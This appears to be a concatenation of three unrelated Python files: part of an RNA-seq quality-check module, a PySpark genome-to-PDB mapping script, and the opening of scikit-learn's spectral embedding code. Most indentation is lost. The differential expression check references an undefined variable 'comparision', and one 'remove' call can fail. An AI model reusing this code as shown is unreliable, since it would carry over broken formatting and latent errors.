FlagCode.GREEN: "No genome alignment metric outliers detected for {metrics}",
FlagCode.YELLOW1: "Outliers detected as follows (values are rounded number of standard deviations from middle): {formatted_outliers}",
FlagCode.RED1: "Outliers detected as follows (values are rounded number of standard deviations from middle): {formatted_outliers}",
}
def validate_func(self: Check, dataset: TemplateDataset) -> Flag:
code = FlagCode.GREEN
# pull variables from config
metrics = self.config["metrics"]
middle = self.config["middle"]
yellow_threshold = self.config["yellow_standard_deviation_threshold"]
red_threshold = self.config["red_standard_deviation_threshold"]
# init trackers for issues
outliers: DefaultDict[str, Dict[str, float]] = defaultdict(dict)
# determine reads components in samples
targetComponents = ["genomeAlignments"]
# iterate through metrics (here all pulled from FastQC general stats)
for targetComponent in targetComponents:
for metric in metrics:
sampleToMetric: Dict[str, float] = {
s.name: getattr(s, targetComponent).mqcData["STAR"][
"General_Stats"
][metric]
for s in dataset.samples.values()
}
# ensure any NaN convert to zero as implied by MultiQC
sampleToMetric = convert_nan_to_zero(sampleToMetric)
# yellow level outliers
if outliersForThisMetric := identify_outliers(
sampleToMetric,
standard_deviation_threshold=yellow_threshold,
middle=middle,
):
if code < FlagCode.YELLOW1:
code = FlagCode.YELLOW1
outliers[metric] = outliers[metric] | outliersForThisMetric
# red level outliers
if outliersForThisMetric := identify_outliers(
sampleToMetric,
standard_deviation_threshold=red_threshold,
middle=middle,
):
if code < FlagCode.RED1:
code = FlagCode.RED1
outliers[metric] = outliers[metric] | outliersForThisMetric
return Flag(
codes=code,
check=self,
message_args={
"outliers": outliers,
"metrics": metrics,
"formatted_outliers": pformat(outliers, formatfloat),
},
)
class DATASET_RSEQCANALYSIS_0001(Check):
config = {
"plots_all": ["Read Distribution", "Infer experiment", "Gene Body Coverage"],
"plot_paired_end": ["Inner Distance"],
"middle": MIDDLE.median,
"yellow_standard_deviation_threshold": 2,
"red_standard_deviation_threshold": 4,
"stranded_assessment_range": {"min": 75, "max": 100}, # percents
"halt_ambiguous_dominant_strandedness_range": {
"min": 60,
"max": 75,
}, # percents
"unstranded_assessment_range": {"min": 40, "max": 60}, # percents
"valid_dominant_strandedness_assessments": [
"Sense (% Tags)",
"Antisense (% Tags)",
], # this leaves out undetermined, which should raise alarms if it is the dominant assessment
}
    description = (
        "Check that the rseqc analysis stats (sourced from the rseqc logs) have no outlier values among samples "
        "for the following plots: {plots_all} (Paired end only: {plot_paired_end}). "
        "Yellow Flagged Outliers are defined as being {yellow_standard_deviation_threshold} - {red_standard_deviation_threshold} standard "
        "deviations away from the {middle.name}. "
        "Red Flagged Outliers are defined as being {red_standard_deviation_threshold}+ standard "
        "deviations away from the {middle.name}. "
        "Additionally the following is assessed for infer experiment strandedness metrics: "
        "A Halt Flag is raised in the case that the dominant strandedness is between "
        "{halt_ambiguous_dominant_strandedness_range} "
        "Note: the 'dominant strandedness' is the max(datasetwide_median(antisense), datasetwide_median(sense)) "
        "Valid assessments include {valid_dominant_strandedness_assessments}, other assessments (e.g. 'undetermined') will raise a Halting flag "
    )
flag_desc = {
FlagCode.GREEN: "No rseqc analysis metric outliers detected for {metrics}",
FlagCode.YELLOW1: "Outliers detected as follows (values are rounded number of standard deviations from middle): {formatted_outliers}",
FlagCode.RED1: "Outliers detected as follows (values are rounded number of standard deviations from middle): {formatted_outliers}",
FlagCode.RED2: "At least one sample is outside the dominant strandedness assignment range: {samples_outside_range}",
FlagCode.HALT1: "The dominant strandedness is {dominant_strandedness}, this is lower than the halting flag threshold.",
        FlagCode.HALT2: "The dominant strandedness is {dominant_strandedness}, which is not a valid assessment.",
}
def validate_func(self: Check, dataset: TemplateDataset) -> Flag:
codes = {FlagCode.GREEN}
# pull variables from config
targetPlotsAll = self.config["plots_all"]
targetPlotsPairedEnd = self.config["plot_paired_end"]
middle = self.config["middle"]
yellow_threshold = self.config["yellow_standard_deviation_threshold"]
red_threshold = self.config["red_standard_deviation_threshold"]
# init trackers for issues
outliers: DefaultDict[str, Dict[str, float]] = defaultdict(dict)
# extend with paired end specific plot if appropriate
targetPlots = targetPlotsAll
if dataset.metadata.paired_end:
targetPlots.extend(targetPlotsPairedEnd)
# iterate through metrics (here all pulled from FastQC general stats)
for plot_name in targetPlots:
# extract dataframe of all samples
df = dataset.getMQCDataFrame(
sample_component="rSeQCAnalysis", mqc_module="RSeQC", mqc_plot=plot_name
)
# convert to samplewise dicts
metricToSampleToMetricValue: Dict[str, Dict[str, float]] = df.to_dict()
for metricName, sampleToMetricValue in metricToSampleToMetricValue.items():
# ensure any NaN convert to zero as implied by MultiQC
sampleToMetricValue = convert_nan_to_zero(sampleToMetricValue)
# yellow level outliers
if outliersForThisMetric := identify_outliers(
sampleToMetricValue,
standard_deviation_threshold=yellow_threshold,
middle=middle,
):
if max(codes) < FlagCode.YELLOW1:
codes.add(FlagCode.YELLOW1)
outliers[metricName] = outliers[metricName] | outliersForThisMetric
# red level outliers
if outliersForThisMetric := identify_outliers(
sampleToMetricValue,
standard_deviation_threshold=red_threshold,
middle=middle,
):
if max(codes) < FlagCode.RED1:
codes.add(FlagCode.RED1)
# remove lower FlagCode YELLOW1
codes.remove(FlagCode.YELLOW1)
outliers[metricName] = outliers[metricName] | outliersForThisMetric
        def get_median_strandedness(dataset: TemplateDataset) -> dict[str, float]:
df = dataset.getMQCDataFrame(
sample_component="rSeQCAnalysis",
mqc_module="RSeQC",
mqc_plot="Infer experiment",
).fillna(
0
) # Nan is a zero for this MultiQC table
median_strandedness = df.median().to_dict()
return median_strandedness
median_strandedness = get_median_strandedness(dataset)
# check if dominant assessment is valid
strand_assessment: str = max(
median_strandedness, key=lambda k: median_strandedness[k]
)
if (
strand_assessment
not in self.config["valid_dominant_strandedness_assessments"]
):
codes.add(FlagCode.HALT2)
# flag based on thresholds
assessment_value: float = median_strandedness[strand_assessment]
is_stranded: bool = (
self.config["stranded_assessment_range"]["max"]
> assessment_value
> self.config["stranded_assessment_range"]["min"]
)
is_unstranded: bool = (
self.config["unstranded_assessment_range"]["max"]
> assessment_value
> self.config["unstranded_assessment_range"]["min"]
)
def determine_samples_outside_range(
dataset: TemplateDataset, min: float, max: float
) -> list[str]:
df = dataset.getMQCDataFrame(
sample_component="rSeQCAnalysis",
mqc_module="RSeQC",
mqc_plot="Infer experiment",
).fillna(
0
) # Nan is a zero for this MultiQC table
return df.index[df[strand_assessment].between(min, max) == False].to_list()
# Catalog and flag any samples outside of range
# flags based on samples that are out of the assessment range
samples_outside_range: list[str]
if is_stranded:
samples_outside_range = determine_samples_outside_range(
dataset,
self.config["stranded_assessment_range"]["min"],
self.config["stranded_assessment_range"]["max"],
)
elif is_unstranded:
samples_outside_range = determine_samples_outside_range(
dataset,
self.config["unstranded_assessment_range"]["min"],
self.config["unstranded_assessment_range"]["max"],
)
        else:  # this means that the strandedness is ambiguous
samples_outside_range = list()
codes.add(FlagCode.HALT1)
if len(samples_outside_range) != 0:
codes.add(FlagCode.RED2)
return Flag(
codes=codes,
check=self,
message_args={
"outliers": outliers,
"formatted_outliers": pformat(outliers, formatfloat),
"dominant_strandedness": (strand_assessment, assessment_value),
"samples_outside_range": samples_outside_range,
},
)
class DATASET_GENECOUNTS_0001(Check):
config = {
"metrics": [
"Unalignable",
"Alignable",
"Filtered",
"Total",
"alignable_percent",
"Unique",
"Multi",
"Uncertain",
],
"middle": MIDDLE.median,
"yellow_standard_deviation_threshold": 2,
"red_standard_deviation_threshold": 4,
}
    description = (
        "Check that the gene counts alignments (sourced from the RSEM logs) have no outlier values among samples "
        "for the following metrics: {metrics} "
        "Yellow Flagged Outliers are defined as being {yellow_standard_deviation_threshold} - {red_standard_deviation_threshold} standard "
        "deviations away from the {middle.name}. "
        "Red Flagged Outliers are defined as being {red_standard_deviation_threshold}+ standard "
        "deviations away from the {middle.name}. "
    )
flag_desc = {
FlagCode.GREEN: "No gene count mapping metric outliers detected for {metrics}",
FlagCode.YELLOW1: "Outliers detected as follows (values are rounded number of standard deviations from middle): {formatted_outliers}",
FlagCode.RED1: "Outliers detected as follows (values are rounded number of standard deviations from middle): {formatted_outliers}",
}
def validate_func(self: Check, dataset: TemplateDataset) -> Flag:
codes = {FlagCode.GREEN}
# pull variables from config
metrics = self.config["metrics"]
middle = self.config["middle"]
yellow_threshold = self.config["yellow_standard_deviation_threshold"]
red_threshold = self.config["red_standard_deviation_threshold"]
# init trackers for issues
outliers: DefaultDict[str, Dict[str, float]] = defaultdict(dict)
# extract dataframe of general stats
df = dataset.getMQCDataFrame(
sample_component="geneCounts", mqc_module="Rsem", mqc_plot="general_stats"
)
# iterate through metrics (here all pulled from FastQC general stats)
for metric_name in metrics:
sampleToMetricValue = df[[metric_name]].to_dict()[metric_name]
# ensure any NaN convert to zero as implied by MultiQC
sampleToMetricValue = convert_nan_to_zero(sampleToMetricValue)
# yellow level outliers
if outliersForThisMetric := identify_outliers(
sampleToMetricValue,
standard_deviation_threshold=yellow_threshold,
middle=middle,
):
if max(codes) < FlagCode.YELLOW1:
codes.add(FlagCode.YELLOW1)
outliers[metric_name] = (
outliers[metric_name] | outliersForThisMetric
)
# red level outliers
if outliersForThisMetric := identify_outliers(
sampleToMetricValue,
standard_deviation_threshold=red_threshold,
middle=middle,
):
if max(codes) < FlagCode.RED1:
codes.add(FlagCode.RED1)
outliers[metric_name] = (
outliers[metric_name] | outliersForThisMetric
)
return Flag(
codes=codes,
check=self,
message_args={
"outliers": outliers,
"formatted_outliers": pformat(outliers, formatfloat),
"metrics": metrics,
},
)
# TODO: Flag message gets really messy, convert into a json like string for easier reading/parsing
# TODO: Check for extra unexpected columns, these should give clues to names differences
class DATASET_DIFFERENTIALGENEEXPRESSION_0001(Check):
handle_with_monads = True
config = {
"expected_tables": [
"differential_expression.csv",
"visualization_output_table.csv",
"visualization_PCA_table.csv",
],
# Expected column name, but dependent on dataset organism
"dge_table_master_annotation_keys": {
"Arabidopsis thaliana": "TAIR",
"_DEFAULT": "ENSEMBL",
},
"dge_table_expected_annotation_columns": [
"SYMBOL",
"GENENAME",
"REFSEQ",
"ENTREZID",
"STRING_id",
"GOSLIM_IDS",
],
# includes column specific constraints
# these prefix as follows {prefix}{pairWiseFactorGroupComparison}
"pairwise_columns_prefixes": {
"Log2fc_": {"nonNull": True},
"Stat_": {"nonNull": True},
# can be removed from analysis before p-value and adj-p-value assessed
# ref: https://bioconductor.org/packages/release/bioc/vignettes/DESeq2/inst/doc/DESeq2.html#why-are-some-p-values-set-to-na
"P.value_": {"nonNegative": True, "nonNull": False},
"Adj.p.value_": {"nonNegative": True, "nonNull": False},
},
"viz_pairwise_columns_prefixes": {
"Log2_Adj.p.value_": {"nonNull": False},
"Sig.1_": {"allowedValues": [False, True], "nonNull": False},
"Sig.05_": {"allowedValues": [False, True], "nonNull": False},
"Log2_P.value_": {"nonNegative": False, "nonNull": False},
"Updown_": {"allowedValues": [1, 0, -1], "nonNull": True},
},
# these prefix as follows {prefix}{FactorGroup}
"group_factorwise_columns_prefixes": {
"Group.Mean_": {"nonNull": True, "nonNegative": True},
"Group.Stdev_": {"nonNull": True, "nonNegative": True},
},
"fixed_stats_columns": {
"All.mean": {"nonNull": True, "nonNegative": True},
"All.stdev": {"nonNull": True, "nonNegative": True},
"LRT.p.value": {"nonNull": False, "nonNegative": True},
},
"sample_counts_constraints": {"nonNegative": True},
"expected_vis_pca_columns": [
"PC1",
"PC2",
], # more may be included but these are REQUIRED
"float_tolerance": 0.0001, # PERCENT
# TODO: DISCUSS, these baseline values, should indicate a very heavy left-hand skewed histogram of differences - JDO
"log2fc_cross_method_percent_difference_threshold": 10, # PERCENT
"log2fc_cross_method_tolerance_percent": 50, # PERCENT
# PERCENT difference minimum between group means to included
"log2fc_cross_method_sign_check_group_mean_difference_threshold": 50,
# PERCENT genes allowed sign inversions between methods for groups that meet
# log2fc_cross_method_sign_check_group_mean_difference_threshold minimum
"log2fc_cross_method_sign_check_tolerance_percent": 0,
# "middle": MIDDLE.median,
# "yellow_standard_deviation_threshold": 2,
# "red_standard_deviation_threshold": 4,
}
    description = (
        "Check that the differential expression outputs exist (sourced from the deseq2 script) and include "
        "the following tables: {expected_tables}. "
        "For studies with ERCC spike-in, performs the same check on analogous tables. "
        "Additionally performs the following file-specific validations: "
        "- contrasts.csv: Includes all the existing comparison groups (based on factor values in the metadata) and is formatted correctly. "
        "- differential_expression.csv: Includes expected annotation columns {dge_table_expected_annotation_columns}, includes a master annotation key "
        "column dependent on the dataset organism as follows: {dge_table_master_annotation_keys}, "
        "includes sample count columns for all samples, all sample count values are non-negative, "
        "all pairwise comparison columns exist with the following prefixes and adhere to the following constraints: {pairwise_columns_prefixes} "
        "all groupFactorWise statistics columns exist with the following prefixes and adhere to the following constraints: {group_factorwise_columns_prefixes} "
        "all fixed statistics columns exist and adhere to the following constraints: {fixed_stats_columns} "
        "- visualization_PCA_table.csv: All samples are in the index and the following columns exist: {expected_vis_pca_columns} "
        "- visualization_output_table.csv: Performs the same checks as differential_expression.csv as well as "
        "ensuring the additional pairwise comparison columns exist with the following prefixes and "
        "adhere to the following constraints: {viz_pairwise_columns_prefixes}. "
        "Confirms that gene counts between the differential expression table and normalized counts tables are the same. "
        "Confirms that computations match expectations with respect to the following operations: (Float tolerance: +/-{float_tolerance} %) "
        "- Group means are correctly computed from normalized counts "
        "- log2FC values (computed with DESeq2's MLE approach) are comparable to direct computation with log2( mean(group1) / mean(group2) ), specifically "
        "checking if at least {log2fc_cross_method_tolerance_percent} % of all genes have absolute percent differences between methods "
        "less than {log2fc_cross_method_percent_difference_threshold} % "
    )
flag_desc = {
FlagCode.GREEN: "All described elements checked and no issues arose",
FlagCode.HALT1: "Contrasts file does not match expectations based on metadata: Error Message(s): {contrasts_err_msg}",
FlagCode.HALT2: "Differential expression file does not match expectations: Error Message(s): {differential_expression_table_err_msg}",
FlagCode.HALT3: "Viz PCA file does not match expectations: Error Message(s): {viz_pca_err_msg}",
FlagCode.HALT4: "Viz output table file does not match expectations: Error Message(s): {viz_output_table_err_msg}",
}
def _contrasts_check(self, dataset: TemplateDataset, componentTarget: str) -> str:
"""Performs contrasts specific subcheck
Returns empty string if no issues are found
Returns an error message (string) otherwise
"""
# extract target Component
target_component = getattr(dataset, componentTarget)
err_msg = ""
# extract dicts for deseq2 contrasts and the metadata formatted one here
# make sure to read in explicit index column for deseq2
dict_deseq2: Dict = pd.read_csv(
target_component.contrastsCSV.path, index_col=0
).to_dict(orient="list")
dict_data_model: Dict = dataset.metadata.contrasts.to_dict(orient="list")
# check that all headers are present
deseq2_headers = set(dict_deseq2.keys())
data_model_headers = set(dict_data_model.keys())
if deseq2_headers != data_model_headers:
err_msg += f"Header disparity! Extra deseq2 headers: {deseq2_headers - data_model_headers} Extra metadata headers: {data_model_headers - deseq2_headers}"
# return early, if headers mismatch no point in checking column content
return err_msg
        # check that the contents of each column match expectations (group1 and group2 formatted as expected)
# this also rechecks headers (keys) but that is caught in the prior validation
if dict_deseq2 != dict_data_model:
err_msg += f"Rows don't match expectations. Deseq2: {dict_deseq2}. DataModel (from metadata source): {dict_data_model}"
return err_msg
def _differential_expression_table_check(
self,
dataset: TemplateDataset,
componentTarget: str,
componentDataAsset: str = "annotatedTableCSV",
) -> str:
err_msg = ""
target_component = getattr(dataset, componentTarget)
target_data_asset = getattr(target_component, componentDataAsset)
# read in dataframe
df_dge = pd.read_csv(target_data_asset.path)
# check all constant columns exist
missing_constant_columns: set
master_key = self.config["dge_table_master_annotation_keys"].get(
dataset.metadata.organism,
self.config["dge_table_master_annotation_keys"]["_DEFAULT"],
)
log.debug(
f"Resolved master annotation key for {dataset.metadata.organism} is {master_key}"
)
expected_columns: list = self.config["dge_table_expected_annotation_columns"] + [master_key] # type: ignore
if missing_constant_columns := set(expected_columns) - set(df_dge.columns):
err_msg += f"Annotation Columns missing: {missing_constant_columns}"
# check all sample counts columns exist
expected_samples = set(dataset.samples.keys())
if missing_samples := expected_samples - set(df_dge.columns):
err_msg += f"Sample Count Columns missing: {missing_samples}"
        # check that they meet constraints
        # all sample column counts are non-negative
        present_samples = expected_samples - missing_samples
        if present_samples and not (df_dge[list(present_samples)] >= 0).all(axis=None):
            negative_count_columns = [
                col for col in present_samples if (df_dge[col] < 0).any()
            ]
            err_msg += (
                f"Sample Count Columns include negative values: {negative_count_columns}"
            )
# check all expected statistic columns present
# pairwise comparison level
pairwise_comparisons = dataset.metadata.contrasts.columns
for statistical_prefix, constraints in self.config[
"pairwise_columns_prefixes"
].items(): # type: ignore
target_cols: list = [
f"{statistical_prefix}{comparison}"
for comparison in pairwise_comparisons
]
            # check existence first and bail if any don't exist
if missing_cols := set(target_cols) - set(df_dge.columns):
err_msg += f"Missing pairwise statistical column(s): {missing_cols}"
continue
target_df_subset: pd.DataFrame = df_dge[target_cols]
# check non null constraint
if constraints.get("nonNull") and nonNull(target_df_subset) == False:
err_msg += f"At least one value in columns {target_cols} fails nonNull constraint."
# check non negative constraint
if (
constraints.get("nonNegative")
and nonNegative(target_df_subset) == False
):
err_msg += f"At least one value in columns {target_cols} fails nonNegative constraint."
# factorGroup level
factorGroups = list(
set(dataset.metadata.factor_groups.values())
) # list-set to dedupe
for statistical_prefix, constraints in self.config[
"group_factorwise_columns_prefixes"
].items(): # type: ignore
target_cols = [f"{statistical_prefix}{group}" for group in factorGroups]
            # check existence first and bail if any don't exist
if missing_cols := set(target_cols) - set(df_dge.columns):
err_msg += f"Missing groupFactor statistical column(s): {missing_cols}"
continue
target_df_subset = df_dge[target_cols]
# check non null constraint
if constraints.get("nonNull") and nonNull(target_df_subset) == False:
err_msg += f"At least one value in columns {target_cols} fails nonNull constraint."
# check non negative constraint
if (
constraints.get("nonNegative")
and nonNegative(target_df_subset) == False
):
err_msg += f"At least one value in columns {target_cols} fails nonNegative constraint."
# fixed stat columns level
for target_col, constraints in self.config["fixed_stats_columns"].items(): # type: ignore
            # check existence first and bail if any don't exist
if missing_cols := {target_col} - set(df_dge.columns):
err_msg += f"Missing fixed statistical column(s): {missing_cols}"
continue
target_df_subset = df_dge[target_col]
# check non null constraint
if constraints.get("nonNull") and nonNull(target_df_subset) == False:
err_msg += f"At least one value in column ['{target_col}'] fails nonNull constraint."
# check non negative constraint
if (
constraints.get("nonNegative")
and nonNegative(target_df_subset) == False
):
err_msg += f"At least one value in column ['{target_col}'] fails nonNegative constraint."
# mathematical checks
groups: list[str] = list(
{group for group in dataset.metadata.factor_groups.values()}
)
# check means are computed correctly
for query_group in groups:
query_column = f"Group.Mean_{query_group}"
group_samples = [
sample
for sample, this_group in dataset.metadata.factor_groups.items()
if this_group == query_group
]
abs_percent_difference = abs(
(
(
(
df_dge[group_samples].mean(axis="columns")
- df_dge[query_column]
)
/ df_dge[query_column]
)
* 100
)
)
within_tolerance = abs_percent_difference < self.config["float_tolerance"]
            if not within_tolerance.all():
                err_msg += f"Group Mean value in table is out of float tolerance. This means {query_group} has improperly computed values. "
# check that log2FC are within a reasonable range
# the log2FC computation within DESEQ2 is NOT directly computed from the ratio of group means
#
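        # Illustrative sketch with hypothetical numbers: if mean(group1)=20 and
        # mean(group2)=5, the direct estimate is log2(20 / 5) = 2.0; a DESeq2 MLE value
        # of 1.9 gives |2.0 - 1.9| / 1.9 * 100 ≈ 5.3 % difference, which falls under the
        # default 10 % per-gene threshold. The loop below only flags a comparison when
        # too few genes stay under that threshold.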
        for comparison in dataset.metadata.contrasts.columns:
            query_column = f"Log2fc_{comparison}"
            group1_mean_col = (
                "Group.Mean_" + comparison.split(")v(")[0] + ")"
            )  # Uses parens and adds them back to prevent slicing on 'v' within factor names
            group2_mean_col = "Group.Mean_" + "(" + comparison.split(")v(")[1]
computed_log2fc = (df_dge[group1_mean_col] / df_dge[group2_mean_col]).apply(
math.log, args=[2]
)
abs_percent_difference = abs(
((computed_log2fc - df_dge[query_column]) / df_dge[query_column]) * 100
)
percent_within_tolerance = (
mean(
abs_percent_difference
< self.config["log2fc_cross_method_percent_difference_threshold"]
)
* 100
)
# flag if not enough within tolerance
if (
percent_within_tolerance
< self.config["log2fc_cross_method_tolerance_percent"]
):
err_msg += (
f"For comparison: '{comparision}' {percent_within_tolerance:.2f} % of genes have absolute percent differences "
f"(between log2fc direct computation and DESeq2's approach) "
f"less than {self.config['log2fc_cross_method_percent_difference_threshold']} % which does not met the minimum percentage "
f"({self.config['log2fc_cross_method_tolerance_percent']} %) of genes required. "
f"This may indicate misassigned or misaligned columns. "
)
return err_msg
def _viz_pca_table_check(
self,
dataset: TemplateDataset,
componentTarget: str,
dataAssetTarget: str = "visualizationPCATableCSV",
) -> str:
err_msg = ""
target_component = getattr(dataset, componentTarget)
target_asset = getattr(target_component, dataAssetTarget)
# read into dataframe
df = pd.read_csv(target_asset.path, index_col=0)
# check all samples included
if missing_samples := set(dataset.samples.keys()) - set(df.index):
err_msg += f"Missing samples in index: {missing_samples}"
# check all expected columns exist
if missing_cols := set(self.config["expected_vis_pca_columns"]) - set(df.columns): # type: ignore
err_msg += f"Missing expected columns: {missing_cols}"
return err_msg
def _viz_output_table_check(
self, dataset: TemplateDataset, componentTarget: str
) -> str:
"""Since this effectively extends the differential expression table,
run that first and build on the error message as needed"""
err_msg = self._differential_expression_table_check(
dataset, componentTarget, componentDataAsset="visualizationTableCSV"
)
target_component = getattr(dataset, componentTarget)
target_data_asset = getattr(target_component, "visualizationTableCSV")
# read in dataframe
df = pd.read_csv(target_data_asset.path)
        # check all expected columns exist (all unique to the viz table)
# check all expected statistic columns present
# pairwise comparison level
pairwise_comparisons = dataset.metadata.contrasts.columns
for statistical_prefix, constraints in self.config[
"viz_pairwise_columns_prefixes"
].items(): # type: ignore
target_cols: list = [
f"{statistical_prefix}{comparison}"
for comparison in pairwise_comparisons
]
            # check existence first and bail if any don't exist
if missing_cols := set(target_cols) - set(df.columns):
err_msg += f"Missing pairwise statistical column(s): {missing_cols}"
continue
target_df_subset: pd.DataFrame = df[target_cols]
# check non null constraint
if constraints.get("nonNull") and nonNull(target_df_subset) == False:
err_msg += f"At least one value in columns {target_cols} fails nonNull constraint."
# check non negative constraint
if (
constraints.get("nonNegative")
and nonNegative(target_df_subset) == False
):
err_msg += f"At least one value in columns {target_cols} fails nonNegative constraint."
# check allowed values constraint
if (
constraints.get("allowedValues")
and onlyAllowedValues(
target_df_subset, constraints.get("allowedValues")
)
== False
):
err_msg += f"At least one value in columns {target_cols} fails allowedValues constraint (allowed values: {constraints.get('allowedValues')})."
return err_msg
def validate_func(self: Check, dataset: TemplateDataset) -> Flag:
codes = {FlagCode.GREEN}
target_components = ["differentialGeneExpression"]
if dataset.metadata.has_ercc:
target_components.append("differentialGeneExpressionERCC")
# holds component and subcheck specific error messages
err_msgs: Dict = defaultdict(dict)
for target_component in target_components:
#results = FlaggableMonad(dataset)
#results = results.bind(self._contrasts_check)
# perform contrasts file subcheck
contrasts_result = self._contrasts_check(dataset, target_component)
if contrasts_result != "":
codes.add(FlagCode.HALT1)
err_msgs["contrasts"][target_component] = contrasts_result
# perform differential expression file subcheck
differential_expression_result = self._differential_expression_table_check(
dataset, target_component
)
if differential_expression_result != "":
codes.add(FlagCode.HALT2)
err_msgs["differential_expression"][
target_component
] = differential_expression_result
# perform viz PCA file subcheck
viz_pca_result = self._viz_pca_table_check(dataset, target_component)
if viz_pca_result != "":
codes.add(FlagCode.HALT3)
err_msgs["viz_pca"][target_component] = viz_pca_result
            # perform viz output table subcheck
viz_output_table_result = self._viz_output_table_check(
dataset, target_component
)
if viz_output_table_result != "":
codes.add(FlagCode.HALT4)
err_msgs["viz_output_table"][target_component] = viz_output_table_result
return Flag(
codes=codes,
check=self,
message_args={
"contrasts_err_msg": "::".join(
[f"{k}->{v}" for k, v in err_msgs["contrasts"].items()]
),
"differential_expression_table_err_msg": "::".join(
[
f"{k}->{v}"
for k, v in err_msgs["differential_expression"].items()
]
),
"viz_pca_table_err_msg": "::".join(
[f"{k}->{v}" for k, v in err_msgs["viz_pca"].items()]
),
"viz_output_table_err_msg": "::".join(
[f"{k}->{v}" for k, v in err_msgs["viz_output_table"].items()]
),
},
)
| StarcoderdataPython |
3230471 | #for chrom in ["chr1", "chr10", "chr11", "chr12", "chr13", "chr14", "chr15", "chr16", "chr17", "chr18", "chr19", "chr2", "chr20", "chr21", "chr22", "chr3", "chr4", "chr5", "chr6", "chr7", "chr8", "chr9", "chrX", "chrY"]:
#for chrom in ["chr19", "chr2", "chr20", "chr21", "chr22", "chr3", "chr4", "chr5", "chr6", "chr7", "chr8", "chr9", "chrX", "chrY"]:
localDir = "/home/ubuntu/pkerp"
for chrom in ["chrY"]:
dataframe = "/data/dataframes.rcsb.org/parquet/humangenome/20160517/hg38/" + chrom
uniprotpdbFile = '/data/dataframes.rcsb.org/parquet/uniprotpdb/20160517/'
chrMappingsFile = "/data/GCF_000001405.33.assembly.txt"
chrMappings = dict(sc.textFile(localDir + chrMappingsFile)
.filter(lambda x: x[0] != '#')
.map(lambda x: x.split('\t'))
.map(lambda x: dict(zip("Sequence-Name Sequence-Role Assigned-Molecule Assigned-Molecule-Location/Type GenBank-Accn Relationship RefSeq-Accn Assembly-Unit Sequence-Length UCSC-style-name".split(), x)))
.map(lambda x: (x['UCSC-style-name'],x['GenBank-Accn']))
.collect())
humangenome = (sqlContext.read.parquet(localDir + dataframe))
humangenome.registerTempTable("humangenome")
humangenome.count() #115,989,151
protpos_chrompos = humangenome.map(lambda x: ((x.uniProtId, int(x.uniProtPos)), (x.chromosomeName, x.orientation, x.position)))
uniprotpdb = (sqlContext.read.parquet(localDir + uniprotpdbFile))
uniprotpdb.registerTempTable("uniprotpdb")
uniprotpdb.count() #74,209,158
protpos_pdbinfo = uniprotpdb.map(lambda x: ((x.uniProtId, int(x.uniProtPos)), (x.pdbId, x.chainId, x.pdbAtomPos, x.insCode)))
joined = protpos_chrompos.join(protpos_pdbinfo)
    # Python 3 lambdas cannot unpack nested tuples in their signature, so index into
    # ((protid, protpos), ((chrid, orientation, pos), (pdbid, chainid, pdbAtomPos, insCode))).
    joined_formatted = joined.map(
        lambda kv: " ".join(map(str, list(kv[0]) + list(kv[1][0]) + list(kv[1][1])))
    )
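    # Each output record is one space-separated line of the nine fields above, e.g.
    # "P04637 120 chrY + 2787001 1tup A 152 None" (hypothetical values, for illustration only).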
joined_formatted.saveAsTextFile("output/protpos_chrompos_pdbinfo_formatted_" + chrom)
| StarcoderdataPython |
3343925 | """Spectral Embedding."""
# Author: <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
# License: BSD 3 clause
import warnings
import numpy as np
from scipy import sparse
from scipy.linalg import eigh
from scipy.sparse.linalg import eigsh
from scipy.sparse.csgraph import connected_components
from scipy.sparse.csgraph import laplacian as csgraph_laplacian
from ..base import BaseEstimator
from ..utils import (
check_array,
check_random_state,
check_symmetric,
)
from ..utils._arpack import _init_arpack_v0
from ..utils.extmath import _deterministic_vector_sign_flip
from ..utils.fixes import lobpcg
from ..metrics.pairwise import rbf_kernel
from ..neighbors import kneighbors_graph, NearestNeighbors
from ..utils.validation import _deprecate_positional_args
from ..utils.deprecation import deprecated
def _graph_connected_component(graph, node_id):
"""Find the largest graph connected components that contains one
given node.
Parameters
----------
graph : array-like of shape (n_samples, n_samples)
Adjacency matrix of the graph, non-zero weight means an edge
between the nodes.
node_id : int
The index of the query node of the graph.
Returns
-------
connected_components_matrix : array-like of shape (n_samples,)
An array of bool value indicating the indexes of the nodes
belonging to the largest connected components of the given query
node.
"""
n_node = graph.shape[0]
if sparse.issparse(graph):
# speed up row-wise access to boolean connection mask
graph = graph.tocsr()
connected_nodes = np.zeros(n_node, dtype=bool)
nodes_to_explore = np.zeros(n_node, dtype=bool)
nodes_to_explore[node_id] = True
for _ in range(n_node):
last_num_component = connected_nodes.sum()
np.logical_or(connected_nodes, nodes_to_explore, out=connected_nodes)
if last_num_component >= connected_nodes.sum():
break
indices = np.where(nodes_to_explore)[0]
nodes_to_explore.fill(False)
for i in indices:
if sparse.issparse(graph):
neighbors = graph[i].toarray().ravel()
else:
neighbors = graph[i]
np.logical_or(nodes_to_explore, neighbors, out=nodes_to_explore)
return connected_nodes
def _graph_is_connected(graph):
""" Return whether the graph is connected (True) or Not (False).
Parameters
----------
graph : {array-like, sparse matrix} of shape (n_samples, n_samples)
Adjacency matrix of the graph, non-zero weight means an edge
between the nodes.
Returns
-------
is_connected : bool
True means the graph is fully connected and False means not.
"""
if sparse.isspmatrix(graph):
# sparse graph, find all the connected components
n_connected_components, _ = connected_components(graph)
return n_connected_components == 1
else:
# dense graph, find all connected components start from node 0
return _graph_connected_component(graph, 0).sum() == graph.shape[0]
def _set_diag(laplacian, value, norm_laplacian):
"""Set the diagonal of the laplacian matrix and convert it to a
sparse format well suited for eigenvalue decomposition.
Parameters
----------
laplacian : {ndarray, sparse matrix}
The graph laplacian.
value : float
The value of the diagonal.
norm_laplacian : bool
Whether the value of the diagonal should be changed or not.
Returns
-------
laplacian : {array, sparse matrix}
An array of matrix in a form that is well suited to fast
eigenvalue decomposition, depending on the band width of the
matrix.
"""
n_nodes = laplacian.shape[0]
    # We need to set all entries in the diagonal to the given value
if not sparse.isspmatrix(laplacian):
if norm_laplacian:
laplacian.flat[::n_nodes + 1] = value
else:
laplacian = laplacian.tocoo()
if norm_laplacian:
diag_idx = (laplacian.row == laplacian.col)
laplacian.data[diag_idx] = value
# If the matrix has a small number of diagonals (as in the
# case of structured matrices coming from images), the
# dia format might be best suited for matvec products:
n_diags = np.unique(laplacian.row - laplacian.col).size
if n_diags <= 7:
# 3 or less outer diagonals on each side
laplacian = laplacian.todia()
else:
# csr has the fastest matvec and is thus best suited to
# arpack
laplacian = laplacian.tocsr()
return laplacian
@_deprecate_positional_args
def spectral_embedding(adjacency, *, n_components=8, eigen_solver=None,
